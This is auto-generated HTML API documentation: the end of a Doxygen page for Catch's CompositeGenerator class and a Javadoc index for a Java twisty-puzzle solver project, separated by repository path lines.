class="groupheader">Member Function Documentation</h2> <a id="af3774d42ad2d3453d089ca599efe0517"></a> <h2 class="memtitle"><span class="permalink"><a href="#af3774d42ad2d3453d089ca599efe0517">&#9670;&nbsp;</a></span>add()</h2> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;typename T&gt; </div> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname">void <a class="el" href="class_catch_1_1_composite_generator.html">Catch::CompositeGenerator</a>&lt; T &gt;::add </td> <td>(</td> <td class="paramtype">const <a class="el" href="struct_catch_1_1_i_generator.html">IGenerator</a>&lt; T &gt; *&#160;</td> <td class="paramname"><em>generator</em></td><td>)</td> <td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span></span> </td> </tr> </table> </div><div class="memdoc"> </div> </div> <a id="a83d6c941e2e735b9528e6e832f7b76e7"></a> <h2 class="memtitle"><span class="permalink"><a href="#a83d6c941e2e735b9528e6e832f7b76e7">&#9670;&nbsp;</a></span>operator T()</h2> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;typename T&gt; </div> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_catch_1_1_composite_generator.html">Catch::CompositeGenerator</a>&lt; T &gt;::operator T </td> <td>(</td> <td class="paramname"></td><td>)</td> <td> const</td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span></span> </td> </tr> </table> </div><div class="memdoc"> </div> </div> <a id="ac3c57cf4ca5472f440bf71e2936bcd4a"></a> <h2 class="memtitle"><span class="permalink"><a href="#ac3c57cf4ca5472f440bf71e2936bcd4a">&#9670;&nbsp;</a></span>setFileInfo()</h2> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;typename T&gt; </div> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a>&amp; <a class="el" href="class_catch_1_1_composite_generator.html">Catch::CompositeGenerator</a>&lt; T &gt;::setFileInfo </td> <td>(</td> <td class="paramtype">const char *&#160;</td> <td class="paramname"><em>fileInfo</em></td><td>)</td> <td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span></span> </td> </tr> </table> </div><div class="memdoc"> </div> </div> <a id="a2e03f42df85cdd238aabd77a80b075d5"></a> <h2 class="memtitle"><span class="permalink"><a href="#a2e03f42df85cdd238aabd77a80b075d5">&#9670;&nbsp;</a></span>then() <span class="overload">[1/2]</span></h2> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;typename T&gt; </div> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a>&amp; <a class="el" href="class_catch_1_1_composite_generator.html">Catch::CompositeGenerator</a>&lt; T &gt;::then </td> <td>(</td> <td class="paramtype"><a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a>&lt; T &gt; &amp;&#160;</td> <td class="paramname"><em>other</em></td><td>)</td> <td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span></span> </td> </tr> </table> </div><div class="memdoc"> </div> </div> <a id="aefdc11bcfccdf07d2db5f0da3ed8758c"></a> <h2 class="memtitle"><span class="permalink"><a href="#aefdc11bcfccdf07d2db5f0da3ed8758c">&#9670;&nbsp;</a></span>then() <span class="overload">[2/2]</span></h2> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;typename T&gt; </div> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a>&amp; <a class="el" href="class_catch_1_1_composite_generator.html">Catch::CompositeGenerator</a>&lt; T &gt;::then </td> <td>(</td> <td class="paramtype">T&#160;</td> <td class="paramname"><em>value</em></td><td>)</td> <td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span></span> </td> </tr> </table> </div><div class="memdoc"> </div> </div> <hr/>The documentation for this class was generated from the following file:<ul> <li>dns-cache/tests/<a class="el" href="catch_8hpp_source.html">catch.hpp</a></li> </ul> </div><!-- contents --> </div><!-- doc-content --> <!-- start footer part --> <div id="nav-path" class="navpath"><!-- id is needed for treeview function! --> <ul> <li class="navelem"><a class="el" href="namespace_catch.html">Catch</a></li><li class="navelem"><a class="el" href="class_catch_1_1_composite_generator.html">CompositeGenerator</a></li> <li class="footer">Generated by <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.13 </li> </ul> </div> </body> </html>
doc/index-all.html
pc-god-01/automated-twisty-puzzles
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Fri Oct 17 17:30:05 BST 2014 --> <title>Index</title> <meta name="date" content="2014-10-17"> <link rel="stylesheet" type="text/css" href="./stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Index"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="./overview-summary.html">Overview</a></li> <li>Package</li> <li>Class</li> <li><a href="./overview-tree.html">Tree</a></li> <li><a href="./deprecated-list.html">Deprecated</a></li> <li class="navBarCell1Rev">Index</li> <li><a href="./help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="./index.html?index-all.html" target="_top">Frames</a></li> <li><a href="index-all.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="./allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="contentContainer"><a href="#_A_">A</a>&nbsp;<a href="#_B_">B</a>&nbsp;<a href="#_C_">C</a>&nbsp;<a href="#_D_">D</a>&nbsp;<a href="#_E_">E</a>&nbsp;<a href="#_F_">F</a>&nbsp;<a href="#_G_">G</a>&nbsp;<a href="#_H_">H</a>&nbsp;<a href="#_I_">I</a>&nbsp;<a href="#_L_">L</a>&nbsp;<a href="#_M_">M</a>&nbsp;<a href="#_P_">P</a>&nbsp;<a href="#_R_">R</a>&nbsp;<a href="#_T_">T</a>&nbsp;<a href="#_U_">U</a>&nbsp;<a href="#_V_">V</a>&nbsp;<a name="_A_"> <!-- --> </a> <h2 class="title">A</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Validator.html#addColor(main.java.pcgod01.puzzle.Color...)">addColor(Color...)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Validator.html" title="class in main.java.pcgod01.puzzle">Validator</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Validator.html#addMove(main.java.pcgod01.puzzle.Move...)">addMove(Move...)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Validator.html" title="class in main.java.pcgod01.puzzle">Validator</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/Cube.html#applyMove(main.java.pcgod01.puzzle.Move)">applyMove(Move)</a></span> - Method in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/Cube.html" title="class in main.java.pcgod01.puzzle.cube">Cube</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Puzzle.html#applyMove(main.java.pcgod01.puzzle.Move)">applyMove(Move)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Puzzle.html" title="class in main.java.pcgod01.puzzle">Puzzle</a></dt> <dd> <div class="block">Applies a move to a puzzle.</div> </dd> </dl> <a name="_B_"> <!-- --> </a> <h2 class="title">B</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html#B">B</a></span> - Static variable in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube">CubePiece</a></dt> <dd>&nbsp;</dd> </dl> <a name="_C_"> <!-- --> </a> <h2 class="title">C</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Color.html#clone()">clone()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Color.html" title="class in main.java.pcgod01.puzzle">Color</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/Cube.html#clone()">clone()</a></span> - Method in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/Cube.html" title="class in main.java.pcgod01.puzzle.cube">Cube</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html#clone()">clone()</a></span> - Method in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube">CubePiece</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Move.html#clone()">clone()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Move.html" title="class in main.java.pcgod01.puzzle">Move</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Piece.html#clone()">clone()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Piece.html" title="class in main.java.pcgod01.puzzle">Piece</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Puzzle.html#clone()">clone()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Puzzle.html" title="class in main.java.pcgod01.puzzle">Puzzle</a></dt> <dd> <div class="block">Returns a deep-clone of the puzzle.</div> </dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Validator.html#clone()">clone()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Validator.html" title="class in main.java.pcgod01.puzzle">Validator</a></dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/puzzle/Color.html" title="class in main.java.pcgod01.puzzle"><span class="strong">Color</span></a> - Class in <a href="./main/java/pcgod01/puzzle/package-summary.html">main.java.pcgod01.puzzle</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Color.html#Color(java.lang.String)">Color(String)</a></span> - Constructor for class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Color.html" title="class in main.java.pcgod01.puzzle">Color</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Piece.html#colors">colors</a></span> - Variable in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Piece.html" title="class in main.java.pcgod01.puzzle">Piece</a></dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/puzzle/cube/Cube.html" title="class in main.java.pcgod01.puzzle.cube"><span class="strong">Cube</span></a> - Class in <a href="./main/java/pcgod01/puzzle/cube/package-summary.html">main.java.pcgod01.puzzle.cube</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/Cube.html#Cube(int)">Cube(int)</a></span> - Constructor for class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/Cube.html" title="class in main.java.pcgod01.puzzle.cube">Cube</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/Cube.html#Cube(main.java.pcgod01.puzzle.Piece[][][])">Cube(Piece[][][])</a></span> - Constructor for class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/Cube.html" title="class in main.java.pcgod01.puzzle.cube">Cube</a></dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube"><span class="strong">CubePiece</span></a> - Class in <a href="./main/java/pcgod01/puzzle/cube/package-summary.html">main.java.pcgod01.puzzle.cube</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html#CubePiece(main.java.pcgod01.puzzle.Color,%20main.java.pcgod01.puzzle.Color,%20main.java.pcgod01.puzzle.Color,%20main.java.pcgod01.puzzle.Color,%20main.java.pcgod01.puzzle.Color,%20main.java.pcgod01.puzzle.Color)">CubePiece(Color, Color, Color, Color, Color, Color)</a></span> - Constructor for class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube">CubePiece</a></dt> <dd>&nbsp;</dd> </dl> <a name="_D_"> <!-- --> </a> <h2 class="title">D</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html#D">D</a></span> - Static variable in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube">CubePiece</a></dt> <dd>&nbsp;</dd> </dl> <a name="_E_"> <!-- --> </a> <h2 class="title">E</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Color.html#equals(java.lang.Object)">equals(Object)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Color.html" title="class in main.java.pcgod01.puzzle">Color</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/Cube.html#equals(java.lang.Object)">equals(Object)</a></span> - Method in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/Cube.html" title="class in main.java.pcgod01.puzzle.cube">Cube</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Move.html#equals(java.lang.Object)">equals(Object)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Move.html" title="class in main.java.pcgod01.puzzle">Move</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Piece.html#equals(java.lang.Object)">equals(Object)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Piece.html" title="class in main.java.pcgod01.puzzle">Piece</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Puzzle.html#equals(java.lang.Object)">equals(Object)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Puzzle.html" title="class in main.java.pcgod01.puzzle">Puzzle</a></dt> </dl> <a name="_F_"> <!-- --> </a> <h2 class="title">F</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html#F">F</a></span> - Static variable in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube">CubePiece</a></dt> <dd>&nbsp;</dd> </dl> <a name="_G_"> <!-- --> </a> <h2 class="title">G</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Piece.html#getColor(int)">getColor(int)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Piece.html" title="class in main.java.pcgod01.puzzle">Piece</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/Cube.html#getCube()">getCube()</a></span> - Method in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/Cube.html" title="class in main.java.pcgod01.puzzle.cube">Cube</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Move.html#getKey()">getKey()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Move.html" title="class in main.java.pcgod01.puzzle">Move</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/repeat/Repeater.html#getRepeats(main.java.pcgod01.puzzle.Puzzle,%20main.java.pcgod01.puzzle.Move[])">getRepeats(Puzzle, Move[])</a></span> - Static method in class main.java.pcgod01.repeat.<a href="./main/java/pcgod01/repeat/Repeater.html" title="class in main.java.pcgod01.repeat">Repeater</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/Cube.html#getValidator()">getValidator()</a></span> - Static method in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/Cube.html" title="class in main.java.pcgod01.puzzle.cube">Cube</a></dt> <dd>&nbsp;</dd> </dl> <a name="_H_"> <!-- --> </a> <h2 class="title">H</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Color.html#hashCode()">hashCode()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Color.html" title="class in main.java.pcgod01.puzzle">Color</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Move.html#hashCode()">hashCode()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Move.html" title="class in main.java.pcgod01.puzzle">Move</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Piece.html#hashCode()">hashCode()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Piece.html" title="class in main.java.pcgod01.puzzle">Piece</a></dt> <dd>&nbsp;</dd> </dl> <a name="_I_"> <!-- --> </a> <h2 class="title">I</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/Cube.html#initPieces()">initPieces()</a></span> - Method in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/Cube.html" title="class in main.java.pcgod01.puzzle.cube">Cube</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Validator.html#isColorValid(main.java.pcgod01.puzzle.Color...)">isColorValid(Color...)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Validator.html" title="class in main.java.pcgod01.puzzle">Validator</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Validator.html#isMoveValid(main.java.pcgod01.puzzle.Move...)">isMoveValid(Move...)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Validator.html" title="class in main.java.pcgod01.puzzle">Validator</a></dt> <dd>&nbsp;</dd> </dl> <a name="_L_"> <!-- --> </a> <h2 class="title">L</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html#L">L</a></span> - Static variable in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube">CubePiece</a></dt> <dd>&nbsp;</dd> </dl> <a name="_M_"> <!-- --> </a> <h2 class="title">M</h2> <dl> <dt><a href="./main/java/pcgod01/repeat/Main.html" title="class in main.java.pcgod01.repeat"><span class="strong">Main</span></a> - Class in <a href="./main/java/pcgod01/repeat/package-summary.html">main.java.pcgod01.repeat</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/repeat/Main.html#Main()">Main()</a></span> - Constructor for class main.java.pcgod01.repeat.<a href="./main/java/pcgod01/repeat/Main.html" title="class in main.java.pcgod01.repeat">Main</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/repeat/Main.html#main(java.lang.String[])">main(String[])</a></span> - Static method in class main.java.pcgod01.repeat.<a href="./main/java/pcgod01/repeat/Main.html" title="class in main.java.pcgod01.repeat">Main</a></dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/rubiksolver/Main.html" title="class in main.java.pcgod01.rubiksolver"><span class="strong">Main</span></a> - Class in <a href="./main/java/pcgod01/rubiksolver/package-summary.html">main.java.pcgod01.rubiksolver</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/rubiksolver/Main.html#Main()">Main()</a></span> - Constructor for class main.java.pcgod01.rubiksolver.<a href="./main/java/pcgod01/rubiksolver/Main.html" title="class in main.java.pcgod01.rubiksolver">Main</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/rubiksolver/Main.html#main(java.lang.String[])">main(String[])</a></span> - Static method in class main.java.pcgod01.rubiksolver.<a href="./main/java/pcgod01/rubiksolver/Main.html" title="class in main.java.pcgod01.rubiksolver">Main</a></dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/puzzle/package-summary.html">main.java.pcgod01.puzzle</a> - package main.java.pcgod01.puzzle</dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/puzzle/cube/package-summary.html">main.java.pcgod01.puzzle.cube</a> - package main.java.pcgod01.puzzle.cube</dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/repeat/package-summary.html">main.java.pcgod01.repeat</a> - package main.java.pcgod01.repeat</dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/rubiksolver/package-summary.html">main.java.pcgod01.rubiksolver</a> - package main.java.pcgod01.rubiksolver</dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/puzzle/Move.html" title="class in main.java.pcgod01.puzzle"><span class="strong">Move</span></a> - Class in <a href="./main/java/pcgod01/puzzle/package-summary.html">main.java.pcgod01.puzzle</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Move.html#Move(java.lang.String)">Move(String)</a></span> - Constructor for class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Move.html" title="class in main.java.pcgod01.puzzle">Move</a></dt> <dd>&nbsp;</dd> </dl> <a name="_P_"> <!-- --> </a> <h2 class="title">P</h2> <dl> <dt><a href="./main/java/pcgod01/puzzle/Piece.html" title="class in main.java.pcgod01.puzzle"><span class="strong">Piece</span></a> - Class in <a href="./main/java/pcgod01/puzzle/package-summary.html">main.java.pcgod01.puzzle</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Piece.html#Piece(main.java.pcgod01.puzzle.Color[],%20main.java.pcgod01.puzzle.Validator)">Piece(Color[], Validator)</a></span> - Constructor for class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Piece.html" title="class in main.java.pcgod01.puzzle">Piece</a></dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/puzzle/Puzzle.html" title="class in main.java.pcgod01.puzzle"><span class="strong">Puzzle</span></a> - Class in <a href="./main/java/pcgod01/puzzle/package-summary.html">main.java.pcgod01.puzzle</a></dt> <dd> <div class="block">A twisty puzzle that can be fully manipulated.</div> </dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Puzzle.html#Puzzle()">Puzzle()</a></span> - Constructor for class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Puzzle.html" title="class in main.java.pcgod01.puzzle">Puzzle</a></dt> <dd>&nbsp;</dd> </dl> <a name="_R_"> <!-- --> </a> <h2 class="title">R</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html#R">R</a></span> - Static variable in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube">CubePiece</a></dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/repeat/Repeater.html" title="class in main.java.pcgod01.repeat"><span class="strong">Repeater</span></a> - Class in <a href="./main/java/pcgod01/repeat/package-summary.html">main.java.pcgod01.repeat</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/repeat/Repeater.html#Repeater()">Repeater()</a></span> - Constructor for class main.java.pcgod01.repeat.<a href="./main/java/pcgod01/repeat/Repeater.html" title="class in main.java.pcgod01.repeat">Repeater</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html#rotate(main.java.pcgod01.puzzle.Move)">rotate(Move)</a></span> - Method in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube">CubePiece</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Piece.html#rotate(main.java.pcgod01.puzzle.Move)">rotate(Move)</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Piece.html" title="class in main.java.pcgod01.puzzle">Piece</a></dt> <dd>&nbsp;</dd> </dl> <a name="_T_"> <!-- --> </a> <h2 class="title">T</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Color.html#toString()">toString()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Color.html" title="class in main.java.pcgod01.puzzle">Color</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Move.html#toString()">toString()</a></span> - Method in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Move.html" title="class in main.java.pcgod01.puzzle">Move</a></dt> <dd>&nbsp;</dd> </dl> <a name="_U_"> <!-- --> </a> <h2 class="title">U</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/cube/CubePiece.html#U">U</a></span> - Static variable in class main.java.pcgod01.puzzle.cube.<a href="./main/java/pcgod01/puzzle/cube/CubePiece.html" title="class in main.java.pcgod01.puzzle.cube">CubePiece</a></dt> <dd>&nbsp;</dd> </dl> <a name="_V_"> <!-- --> </a> <h2 class="title">V</h2> <dl> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Piece.html#validator">validator</a></span> - Variable in class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Piece.html" title="class in main.java.pcgod01.puzzle">Piece</a></dt> <dd>&nbsp;</dd> <dt><a href="./main/java/pcgod01/puzzle/Validator.html" title="class in main.java.pcgod01.puzzle"><span class="strong">Validator</span></a> - Class in <a href="./main/java/pcgod01/puzzle/package-summary.html">main.java.pcgod01.puzzle</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Validator.html#Validator()">Validator()</a></span> - Constructor for class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Validator.html" title="class in main.java.pcgod01.puzzle">Validator</a></dt> <dd>&nbsp;</dd> <dt><span class="strong"><a href="./main/java/pcgod01/puzzle/Validator.html#Validator(main.java.pcgod01.puzzle.Color[],%20main.java.pcgod01.puzzle.Move[])">Validator(Color[], Move[])</a></span> - Constructor for class main.java.pcgod01.puzzle.<a href="./main/java/pcgod01/puzzle/Validator.html" title="class in main.java.pcgod01.puzzle">Validator</a></dt> <dd>&nbsp;</dd> </dl> <a href="#_A_">A</a>&nbsp;<a href="#_B_">B</a>&nbsp;<a href="#_C_">C</a>&nbsp;<a href="#_D_">D</a>&nbsp;<a href="#_E_">E</a>&nbsp;<a href="#_F_">F</a>&nbsp;<a href="#_G_">G</a>&nbsp;<a href="#_H_">H</a>&nbsp;<a href="#_I_">I</a>&nbsp;<a href="#_L_">L</a>&nbsp;<a href="#_M_">M</a>&nbsp;<a href="#_P_">P</a>&nbsp;<a href="#_R_">R</a>&nbsp;<a href="#_T_">T</a>&nbsp;<a href="#_U_">U</a>&nbsp;<a href="#_V_">V</a>&nbsp;</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="./overview-summary.html">Overview</a></li> <li>Package</li> <li>Class</li> <li><a href="./overview-tree.html">Tree</a></li> <li><a href="./deprecated-list.html">Deprecated</a></li> <li class="navBarCell1Rev">Index</li> <li><a href="./help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="./index.html?index-all.html" target="_top">Frames</a></li> <li><a href="index-all.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="./allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
lib/png++/doc/html/classpng_1_1info-members.html
Nvveen/First-Sight
